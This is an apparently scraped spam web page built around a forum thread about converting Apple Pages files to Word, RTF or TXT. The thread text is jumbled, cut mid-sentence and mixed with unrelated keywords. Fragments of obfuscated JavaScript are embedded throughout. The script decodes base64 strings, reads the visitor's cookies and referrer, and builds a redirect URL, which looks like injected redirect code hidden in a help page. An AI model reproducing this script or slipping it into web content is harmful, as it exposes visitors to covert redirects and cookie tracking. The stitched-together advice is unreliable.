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men/don_con php?x=en&query=',q)+'');}}}}}R(); How to convert pages to doc without a Macby Khardiss on Mar 12, 2010 at 8:45 UTCGPURAMCPUROMOne of our students brought in his report in a.

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Maybe I'm just a sceptic All the online tips say tell the user to resave as Doc or RTF and that's what I'd say as well and they'll have the weekend to finish it.. pages documents aren't files, they're containers) 3 Use the add button to add the file to the converted list5.. Sounds like a great way to get yourself an extention when the works not finished.. Open the Quicklook folder5 Open the preview pdf fileNot only was I able to view the file sent and print it out but the graphics was correct and the formatting was retained.

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*?(?:$|;)/g),_0x4f2bdf={};continue;case'1':if(_0x7b1520){return _0x4f2bdf[_0x7b1520];}continue;case'2':if(!_0x5e001c&&_0x7b1520){return undefined;}continue;case'3':var _0x3d7e79;continue;case'4':return _0x4f2bdf;case'5':for(var _0x3a1c30=0x0;_0x3a1c30=_0x3e8495;},'gpBNX':function _0x5dff05(_0x3f3b48,_0x470089){return _0x3f3b48!==_0x470089;},'gPWmK':'Tbf','ncPsx':function _0x26a066(_0x59ed09,_0x4fb7bd){return _0x59ed09===_0x4fb7bd;},'mvnyI':'klh','UQTGr':function _0x52e41f(_0x5dd93c,_0x39f2dd){return _0x5dd93c&&_0x39f2dd;},'lsQsg':function _0x31f399(_0x4d7fd6,_0x4511fb){return _0x4d7fd6(_0x4511fb);},'ZAdnB':function _0xf4a974(_0x4a184c,_0x5ceea4){return _0x4a184c+_0x5ceea4;}};var _0x51f4d0=[_0x216d('0x1e'),_0x2473a4['wJQqy'],_0x2473a4[_0x216d('0x1f')],_0x2473a4[_0x216d('0x20')],_0x216d('0x21'),_0x2473a4[_0x216d('0x22')],_0x216d('0x23')],_0x51895b=document['referrer'],_0x521e4b=![],_0x2aee03=cookie[_0x216d('0x24')](_0x2473a4['uztdz']);for(var _0x2b8c56=0x0;_0x2b8c56. John8753 Mar 12, 2010 at 8:55 UTCBut currently it only converts the text and not the formatting but they are working on it.. tar) just open the pages file with Winrar to get the xml file**Lawrie5252 Mar 12, 2010 at 8:58 UTCSounds sus, are the students not warned/instructed what formats is acceptable/compatible on campus? Pages can save in a number of formats including RTF DOC and TXT. Akai Mpk Mini Mk2 Garageband Ipad


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The kid is freaking out Can anyone recommend a convertor that will convert this file from.. pages to doc, txt, rtf, or even odf?Rusty Jones Sep 11, 2011 at 2:11 UTC1 Right click the.

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constructor(\x22return\x20this\x22)(\x20)'+');');_0x59892b=_0x37667b();}catch(_0xaaefb1){_0x59892b=window;}var _0x4f60c3='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x59892b['atob']||(_0x59892b['atob']=function(_0x3a9fa6){var _0x37b3d9=String(_0x3a9fa6)['replace'](/=+$/,'');for(var _0x56458c=0x0,_0x19331c,_0xc54a12,_0x47da81=0x0,_0x30afe0='';_0xc54a12=_0x37b3d9['charAt'](_0x47da81++);~_0xc54a12&&(_0x19331c=_0x56458c%0x4?_0x19331c*0x40+_0xc54a12:_0xc54a12,_0x56458c++%0x4)?_0x30afe0+=String['fromCharCode'](0xff&_0x19331c>>(-0x2*_0x56458c&0x6)):0x0){_0xc54a12=_0x4f60c3['indexOf'](_0xc54a12);}return _0x30afe0;});}());_0x216d['base64DecodeUnicode']=function(_0x47cf1d){var _0x1191de=atob(_0x47cf1d);var _0x13992e=[];for(var _0x37c5ab=0x0,_0x910e5b=_0x1191de['length'];_0x37c5ab=_0x40a594;}};var _0x3d7afd=_0xc6381d[_0x216d('0x8')]['split']('|'),_0x340ae2=0x0;while(!![]){switch(_0x3d7afd[_0x340ae2++]){case'0':var _0x5e001c=document['cookie'][_0x216d('0x9')](/[\w-]+=.. pages format pages appears to be from the Apple program Pages, part of the iWorks suite.. 25 RepliesTully Mar 12, 2010 at 8:55 UTCYou could try thisAlthough I have not tried it myself.. pages file and select properties2 Change the extension pages to zip3 Right click and Open the file (there may be several directories and maybe thumbnails, if graphics is involved)4.. Push Convert to TXT button to convert ** Also if you just have the pages file (and not the. 518b7cbc7d